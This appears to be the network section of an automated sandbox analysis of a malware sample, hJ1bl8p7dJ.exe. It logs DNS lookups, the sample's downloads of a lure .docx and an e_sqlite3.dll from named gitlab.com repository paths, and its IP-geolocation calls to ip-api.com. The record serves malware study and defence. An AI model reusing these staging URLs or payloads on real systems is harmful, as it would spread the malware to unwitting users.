                                                                                                                                                                                    Jan 14, 2025 13:13:16.568186045 CET44350009104.26.12.205192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:16.568346024 CET50009443192.168.2.11104.26.12.205
                                                                                                                                                                                    Jan 14, 2025 13:13:16.568852901 CET50009443192.168.2.11104.26.12.205
                                                                                                                                                                                    Jan 14, 2025 13:13:16.568869114 CET44350009104.26.12.205192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:16.570390940 CET5001080192.168.2.11208.95.112.1
                                                                                                                                                                                    Jan 14, 2025 13:13:16.575228930 CET8050010208.95.112.1192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:16.576451063 CET5001080192.168.2.11208.95.112.1
                                                                                                                                                                                    Jan 14, 2025 13:13:16.576643944 CET5001080192.168.2.11208.95.112.1
                                                                                                                                                                                    Jan 14, 2025 13:13:16.582118988 CET8050010208.95.112.1192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:17.029232025 CET8050010208.95.112.1192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:17.044295073 CET5001080192.168.2.11208.95.112.1
                                                                                                                                                                                    Jan 14, 2025 13:13:17.049453974 CET8050010208.95.112.1192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:17.049709082 CET5001080192.168.2.11208.95.112.1

                                                                                                                                                                                    UDP Packets

                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                    Jan 14, 2025 13:12:20.564361095 CET5120253192.168.2.111.1.1.1
                                                                                                                                                                                    Jan 14, 2025 13:12:20.571464062 CET53512021.1.1.1192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:13.538085938 CET5300353192.168.2.111.1.1.1
                                                                                                                                                                                    Jan 14, 2025 13:13:13.544975996 CET53530031.1.1.1192.168.2.11
                                                                                                                                                                                    Jan 14, 2025 13:13:14.783041954 CET5765353192.168.2.111.1.1.1
                                                                                                                                                                                    Jan 14, 2025 13:13:14.790379047 CET53576531.1.1.1192.168.2.11

                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                    Jan 14, 2025 13:12:20.564361095 CET192.168.2.111.1.1.10xed29Standard query (0)gitlab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 14, 2025 13:13:13.538085938 CET192.168.2.111.1.1.10xd502Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 14, 2025 13:13:14.783041954 CET192.168.2.111.1.1.10xae77Standard query (0)ip-api.comA (IP address)IN (0x0001)false

                                                                                                                                                                                    DNS Answers

                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                    Jan 14, 2025 13:12:17.346561909 CET1.1.1.1192.168.2.110xa193No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Jan 14, 2025 13:12:17.346561909 CET1.1.1.1192.168.2.110xa193No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 14, 2025 13:12:20.571464062 CET1.1.1.1192.168.2.110xed29No error (0)gitlab.com172.65.251.78A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 14, 2025 13:12:28.073024988 CET1.1.1.1192.168.2.110xdc54No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 14, 2025 13:12:28.073024988 CET1.1.1.1192.168.2.110xdc54No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 14, 2025 13:13:13.544975996 CET1.1.1.1192.168.2.110xd502No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 14, 2025 13:13:13.544975996 CET1.1.1.1192.168.2.110xd502No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 14, 2025 13:13:13.544975996 CET1.1.1.1192.168.2.110xd502No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 14, 2025 13:13:14.790379047 CET1.1.1.1192.168.2.110xae77No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false

                                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                                    • gitlab.com
                                                                                                                                                                                    • api.ipify.org
                                                                                                                                                                                    • ip-api.com

                                                                                                                                                                                    HTTP Packets

                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    0192.168.2.1150007208.95.112.1807760C:\Users\user\Desktop\hJ1bl8p7dJ.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    Jan 14, 2025 13:13:14.798335075 CET53OUTGET /json/8.46.123.189 HTTP/1.1
                                                                                                                                                                                    Host: ip-api.com
                                                                                                                                                                                    Jan 14, 2025 13:13:15.272903919 CET483INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Tue, 14 Jan 2025 12:13:15 GMT
                                                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                                                    Content-Length: 306
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    X-Ttl: 60
                                                                                                                                                                                    X-Rl: 44
                                                                                                                                                                                    Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                                    Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    1192.168.2.1150010208.95.112.1807760C:\Users\user\Desktop\hJ1bl8p7dJ.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    Jan 14, 2025 13:13:16.576643944 CET53OUTGET /json/8.46.123.189 HTTP/1.1
                                                                                                                                                                                    Host: ip-api.com
                                                                                                                                                                                    Jan 14, 2025 13:13:17.029232025 CET483INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Tue, 14 Jan 2025 12:13:16 GMT
                                                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                                                    Content-Length: 306
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    X-Ttl: 58
                                                                                                                                                                                    X-Rl: 43
                                                                                                                                                                                    Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                                    Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}


                                                                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    0192.168.2.1149722172.65.251.784437760C:\Users\user\Desktop\hJ1bl8p7dJ.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-14 12:12:21 UTC107OUTGET /app8490744/updatesa/-/raw/main/Your_Benefits_and_Role.docx?inline=false HTTP/1.1
                                                                                                                                                                                    Host: gitlab.com
                                                                                                                                                                                    2025-01-14 12:12:21 UTC537INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Tue, 14 Jan 2025 12:12:21 GMT
                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                    Content-Length: 16036
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    CF-Ray: 901d88a8aadc43a3-EWR
                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    Age: 60
                                                                                                                                                                                    Cache-Control: max-age=60, public, must-revalidate, stale-while-revalidate=60, stale-if-error=300, s-maxage=60
                                                                                                                                                                                    Content-Disposition: attachment; filename="Your_Benefits_and_Role.docx"; filename*=UTF-8''Your_Benefits_and_Role.docx
                                                                                                                                                                                    ETag: "c9f854e67f415052529ad6dc8e14658c"
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    2025-01-14 12:12:21 UTC2134INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 61 70 74 63 68 61 2e 6e 65 74 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 6e 73 2e 68 74 6d 6c 20 68 74 74 70 73 3a 2f 2f 2a 2e 7a 75 6f 72 61 2e 63 6f 6d 2f 61 70 70 73 2f 50 75 62 6c 69 63 48 6f 73 74 65 64 50 61 67 65 4c 69 74 65 2e 64 6f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                                                                                                                                                                                    Data Ascii: content-security-policy: base-uri 'self'; child-src https://www.google.com/recaptcha/ https://www.recaptcha.net/ https://www.googletagmanager.com/ns.html https://*.zuora.com/apps/PublicHostedPageLite.do https://gitlab.com/admin/ https://gitlab.com/assets/
                                                                                                                                                                                    2025-01-14 12:12:21 UTC500INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 70 6b 51 77 32 54 69 37 78 71 79 37 44 65 4e 57 37 68 75 6d 33 43 75 6e 49 6a 65 7a 25 32 42 6e 6a 59 44 76 50 39 54 34 58 4c 42 34 36 65 6c 46 66 58 4d 63 45 7a 74 72 51 64 4f 70 38 54 78 58 39 4a 64 65 53 56 4a 31 59 77 52 6b 6c 55 47 43 44 55 56 73 74 4f 74 70 73 46 69 6b 33 32 31 66 72 52 6b 4e 70 4c 6b 25 32 42 34 39 51 76 67 70 78 25 32 46 63 32 67 71 79 36 31 73 7a 73 73 47 30 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20
                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pkQw2Ti7xqy7DeNW7hum3CunIjez%2BnjYDvP9T4XLB46elFfXMcEztrQdOp8TxX9JdeSVJ1YwRklUGCDUVstOtpsFik321frRkNpLk%2B49Qvgpx%2Fc2gqy61szssG0%3D"}],"group":"cf-nel","max_age":604800}NEL:
                                                                                                                                                                                    2025-01-14 12:12:21 UTC936INData Raw: 50 4b 03 04 14 00 06 00 08 00 00 00 21 00 32 91 6f 57 66 01 00 00 a5 05 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: PK!2oWf[Content_Types].xml (
                                                                                                                                                                                    2025-01-14 12:12:21 UTC1369INData Raw: 00 00 00 21 00 1e 91 1a b7 ef 00 00 00 4e 02 00 00 0b 00 08 02 5f 72 65 6c 73 2f 2e 72 65 6c 73 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: !N_rels/.rels (
                                                                                                                                                                                    2025-01-14 12:12:21 UTC1369INData Raw: b7 d2 f8 d7 49 7b b7 75 af 8f 48 74 8e 90 55 1b e7 ae c3 28 be 6e 32 f7 31 cd c1 eb a6 e1 f0 dd 22 13 92 ce 12 98 11 98 1a 01 6b 21 7a 05 f0 7f 50 3a 3c e8 53 f6 a4 db 71 ad f1 24 2a 09 7a ad d6 2d f0 b4 99 88 56 78 cc a1 c3 19 e6 54 d2 77 a0 e6 6e 10 04 8e e1 fb 2d dd 0a 51 4e 61 ab 31 f0 8d 41 df 1f 41 eb 10 38 61 74 07 4d c6 c0 70 ad ae bd 69 9a ca 17 1a 7d 36 a7 65 a2 0e 7b a6 3b 4d 7a 16 53 89 07 59 1d 8a 3f e0 b6 25 85 b0 e2 38 ad 4e d5 e2 15 fb 6d 9d fa ee ce 76 f0 8b 53 d9 11 3b d3 a2 66 5e 51 8b 6c fe 90 c7 a1 ba 9d 8a 82 63 c4 19 62 ab aa fa 1a 3d f6 c8 07 a1 b6 0c 8b 9c 86 b0 b8 b9 64 05 93 4b d6 ba 25 df e5 a9 3e 5f 70 45 93 6f fd f0 db f7 c0 8e 98 02 15 27 ef 69 46 17 4c 92 ab 3b 96 0a c5 de 7c db 27 cf 64 7d 79 06 fd b9 63 b9 90 aa 20 4a 7c
                                                                                                                                                                                    Data Ascii: I{uHtU(n21"k!zP:<Sq$*z-VxTwn-QNa1AA8atMpi}6e{;MzSY?%8NmvS;f^Qlcb=dK%>_pEo'iFL;|'d}yc J|
                                                                                                                                                                                    2025-01-14 12:12:21 UTC1369INData Raw: 52 7b a7 58 ea 18 cc 0f c8 85 fc 7b 01 06 b8 90 0c d3 43 b2 f9 5e 8c df d8 d2 b4 c4 ef 69 9a 61 b4 21 22 d4 85 ec 51 94 f2 8c 6b 16 a2 49 be 40 ae 5a 11 8d 39 67 49 d4 8c 5d f4 26 7e 7f 3c 38 7b 4c 3c 0b b4 23 85 94 1d 38 7f 97 ac 18 95 3a 9b 62 4f 39 93 58 e7 d2 38 6f 1c 62 bb 62 1a 56 7d 23 74 51 e8 dc 54 70 a5 48 58 13 38 5d 27 b0 ec f1 c4 7d 85 70 26 00 e4 1d cb 80 b6 b2 68 0a b8 8c 25 a3 0f 5a 32 44 9b 3d 50 f7 e9 1a a8 a5 2e 19 6d 1a 58 b6 e4 52 64 da fa 9b 60 da 75 2d db ea 99 17 5f 98 3d 49 45 7d c6 72 f2 90 89 c7 84 01 6f 41 05 ad 8b dc 3b b1 fa 4a d7 b5 ef 83 f7 f0 5f 55 ef 7e 5f d5 bb 03 c8 45 92 ad af 68 94 e2 9b fe c8 30 26 ee c5 e7 69 27 a1 79 0f 81 56 7f 82 ae ea 4c 80 54 f1 00 f1 b8 a2 39 c8 13 69 b5 31 19 93 f9 94 3e 00 e5 a1 8a 5e 47 12
                                                                                                                                                                                    Data Ascii: R{X{C^ia!"QkI@Z9gI]&~<8{L<#8:bO9X8obbV}#tQTpHX8]'}p&h%Z2D=P.mXRd`u-_=IE}roA;J_U~_Eh0&i'yVLT9i1>^G
                                                                                                                                                                                    2025-01-14 12:12:21 UTC1369INData Raw: a8 08 34 2a 9c 02 1c f5 5c 7d 16 b3 de ec 75 89 2e 6c 7c 21 38 5b 73 10 cb 98 10 14 66 f1 02 70 94 bf 66 36 c7 f0 1c 93 a1 b1 86 0a 59 aa 09 c7 d9 9a 83 78 8a 09 f1 85 e5 fb 9f 93 9c 98 27 10 7e f5 db f2 1f 00 00 00 ff ff 03 00 50 4b 03 04 14 00 06 00 08 00 00 00 21 00 b6 f4 67 98 d2 06 00 00 c9 20 00 00 15 00 00 00 77 6f 72 64 2f 74 68 65 6d 65 2f 74 68 65 6d 65 31 2e 78 6d 6c ec 59 4b 8b 1b 47 10 be 07 f2 1f 86 b9 cb 7a cd e8 61 ac 35 d2 48 f2 6b d7 36 de b5 83 8f bd 52 6b a6 ad 9e 69 d1 dd da b5 30 86 60 9f 72 09 04 9c 90 43 0c b9 e5 10 42 0c 31 c4 e4 92 1f 63 b0 49 9c 1f 91 ea 1e 49 33 2d f5 c4 8f 5d 83 09 bb 82 55 3f be aa fe ba aa ba ba 34 73 e1 e2 fd 98 3a 47 98 0b c2 92 8e 5b 3d 57 71 1d 9c 8c d8 98 24 61 c7 bd 7d 30 2c b5 5c 47 48 94 8c 11 65 09
                                                                                                                                                                                    Data Ascii: 4*\}u.l|!8[sfpf6Yx'~PK!g word/theme/theme1.xmlYKGza5Hk6Rki0`rCB1cII3-]U?4s:G[=Wq$a}0,\GHe
                                                                                                                                                                                    2025-01-14 12:12:21 UTC1369INData Raw: dc f7 52 46 10 6e 10 d2 63 e5 a7 54 7e e5 dd 53 f7 74 91 31 cd 6d d7 2c db 6b 2b ae a7 e3 69 83 44 2e dc 4c 12 b9 30 8c e0 f2 d8 1c 3e 65 5f b7 33 97 1a f4 94 29 b6 69 34 5b 1f c3 d7 2a 89 6c e4 06 9a 98 3d e7 18 ce 5c dd 07 35 23 34 eb b8 13 f8 c9 04 cd 78 06 fa 84 ca 54 88 86 49 c7 1d c9 a5 a1 3f 24 b3 cc b8 90 7d 24 a2 14 a6 a7 d2 fd c7 44 62 ee 50 12 43 ac e7 dd 40 93 8c 5b b5 d6 54 7b fc 44 c9 b5 2b 9f 9e e5 f4 57 de c9 78 32 c1 23 59 30 92 75 61 2e 55 62 9d 3d 21 58 75 d8 1c 48 ef 47 e3 63 e7 90 ce f9 2d 04 86 f2 9b 55 65 c0 31 11 72 6d cd 31 e1 b9 e0 ce ac b8 91 ae 96 47 d1 78 df 92 1d 51 44 67 11 5a de 28 f9 64 9e c2 75 7b 4d 27 b7 0f cd 74 73 57 66 7f b9 99 c3 50 39 e9 c4 b7 ee db 85 d4 44 2e 69 16 5c 20 ea d6 b4 e7 8f 8f 77 c9 e7 58 65 79 df 60
                                                                                                                                                                                    Data Ascii: RFncT~St1m,k+iD.L0>e_3)i4[*l=\5#4xTI?$}$DbPC@[T{D+Wx2#Y0ua.Ub=!XuHGc-Ue1rm1GxQDgZ(du{M'tsWfP9D.i\ wXey`
                                                                                                                                                                                    2025-01-14 12:12:21 UTC1369INData Raw: b6 d2 e6 a9 4b cf 2e d5 70 f8 f6 d2 df a3 ae 15 62 de ff b2 6a 8b 8c ca 95 29 10 bc 44 55 d5 d4 59 b6 09 26 1e 25 9b 52 07 a6 34 34 bc 15 f0 0d 68 5f b2 4d d8 62 a1 c5 c2 06 b3 2f 28 37 3b 03 ed 76 d1 c9 42 27 3b d2 8b 9c 2c ea 64 b1 93 c5 9d 2c 71 b2 a4 93 0d 9d 6c 68 64 25 74 16 49 09 7f 84 92 77 4b 23 5f 0b 4a c5 0e 17 b7 1d fe 42 d4 24 41 95 a8 c2 f3 66 1a 41 79 89 46 d0 8e 27 d5 db a6 f8 09 e6 16 2e 88 86 4f eb 8a 14 0c 3d 99 31 16 0e 8d 79 ab 0d 13 45 d4 fa 44 d7 60 46 b9 3a 65 30 83 be bd e4 fe 89 b1 2d f1 6f 62 31 53 32 27 50 8e ab 3d cb ba a1 f3 47 13 38 25 0a 1a 44 05 f3 49 0b 79 8a 05 71 5a 88 fc ce 0c e7 b8 91 27 71 18 5f 8f c6 b3 06 4e ec 5c d3 b6 87 c0 b9 7f c6 eb 29 52 b8 68 31 67 9a 34 a6 5f e3 69 12 8d 82 70 d4 bf 09 a2 69 3f 8e e2 b0 7f
                                                                                                                                                                                    Data Ascii: K.pbj)DUY&%R44h_Mb/(7;vB';,d,qlhd%tIwK#_JB$AfAyF'.O=1yED`F:e0-ob1S2'P=G8%DIyqZ'q_N\)Rh1g4_ipi?
                                                                                                                                                                                    2025-01-14 12:12:21 UTC1369INData Raw: ba 55 44 03 3e f9 70 1f 66 b6 b1 5c 8a ae 11 43 00 20 04 20 04 20 a4 83 ad 00 21 00 21 c2 52 80 10 80 10 80 10 80 10 80 10 80 90 cf 08 21 ec 48 d0 1b 42 0c cb 71 91 b1 78 a8 22 ea 0f 21 96 63 ce cc 07 04 10 02 10 02 10 32 cc 56 80 10 80 10 61 29 40 08 40 08 40 08 40 08 40 08 40 c8 67 84 10 b6 7f f5 86 10 53 5f d8 aa 3b 9f 57 11 f5 87 90 e5 72 a1 2c dd b9 2e ba 46 0c 01 80 10 80 10 80 90 0e b6 02 84 00 84 08 4b 01 42 00 42 00 42 00 42 00 42 00 42 3e 23 84 b0 c5 b6 3f 84 58 1a 52 94 85 53 45 d4 1f 42 e6 68 b1 b4 10 32 45 d7 88 21 00 10 02 10 02 10 d2 c1 56 80 10 80 10 61 29 40 08 40 08 40 08 40 08 40 08 40 c8 67 84 10 b6 32 f4 87 10 db b4 35 07 59 55 44 fd 21 64 36 77 6d 57 59 ea a2 6b c4 10 00 08 01 08 01 08 e9 60 2b 40 08 40 88 b0 14 20 04 20 04 20 04 20
                                                                                                                                                                                    Data Ascii: UD>pf\C !!R!HBqx"!c2Va)@@@@@@gS_;Wr,.FKBBBBBB>#?XRSEBh2E!Va)@@@@@@g25YUD!d6wmWYk`+@@


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    1192.168.2.1150003172.65.251.784437760C:\Users\user\Desktop\hJ1bl8p7dJ.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-14 12:13:11 UTC127OUTGET /hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?inline=false HTTP/1.1
                                                                                                                                                                                    Host: gitlab.com
                                                                                                                                                                                    2025-01-14 12:13:11 UTC512INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Tue, 14 Jan 2025 12:13:11 GMT
                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                    Content-Length: 1780736
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    CF-Ray: 901d89e1efaa4297-EWR
                                                                                                                                                                                    CF-Cache-Status: REVALIDATED
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    Cache-Control: max-age=3600, public, must-revalidate, stale-while-revalidate=60, stale-if-error=300, s-maxage=60
                                                                                                                                                                                    Content-Disposition: attachment; filename="e_sqlite3.dll"; filename*=UTF-8''e_sqlite3.dll
                                                                                                                                                                                    ETag: "fc529fb92be2696af6fda5021785be60"
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    2025-01-14 12:13:11 UTC2134INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 61 70 74 63 68 61 2e 6e 65 74 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 6e 73 2e 68 74 6d 6c 20 68 74 74 70 73 3a 2f 2f 2a 2e 7a 75 6f 72 61 2e 63 6f 6d 2f 61 70 70 73 2f 50 75 62 6c 69 63 48 6f 73 74 65 64 50 61 67 65 4c 69 74 65 2e 64 6f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                                                                                                                                                                                    Data Ascii: content-security-policy: base-uri 'self'; child-src https://www.google.com/recaptcha/ https://www.recaptcha.net/ https://www.googletagmanager.com/ns.html https://*.zuora.com/apps/PublicHostedPageLite.do https://gitlab.com/admin/ https://gitlab.com/assets/
